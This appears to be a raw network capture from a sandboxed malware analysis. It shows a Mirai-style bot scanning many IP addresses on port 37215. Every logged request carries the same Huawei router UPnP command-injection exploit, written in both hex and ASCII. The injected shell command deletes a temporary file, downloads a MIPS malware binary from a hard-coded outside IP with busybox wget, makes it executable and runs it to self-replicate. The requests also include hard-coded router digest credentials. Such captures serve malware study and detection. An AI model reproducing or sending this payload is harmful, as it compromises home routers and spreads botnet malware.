                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1855192.168.2.234621241.223.215.337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.602473974 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1856192.168.2.235680041.122.242.3137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.604557037 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1857192.168.2.2344086197.242.104.1337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.604593992 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1858192.168.2.2359928157.196.196.6637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.604607105 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1859192.168.2.235209841.18.216.12037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.604726076 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1860192.168.2.2356644128.99.211.7037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.604747057 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1861192.168.2.2355884197.191.100.8237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.605911016 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1862192.168.2.233991441.223.94.5237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.605947018 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1863192.168.2.2356066103.239.38.21837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.606324911 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1864192.168.2.2334510197.83.4.9937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.606652021 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
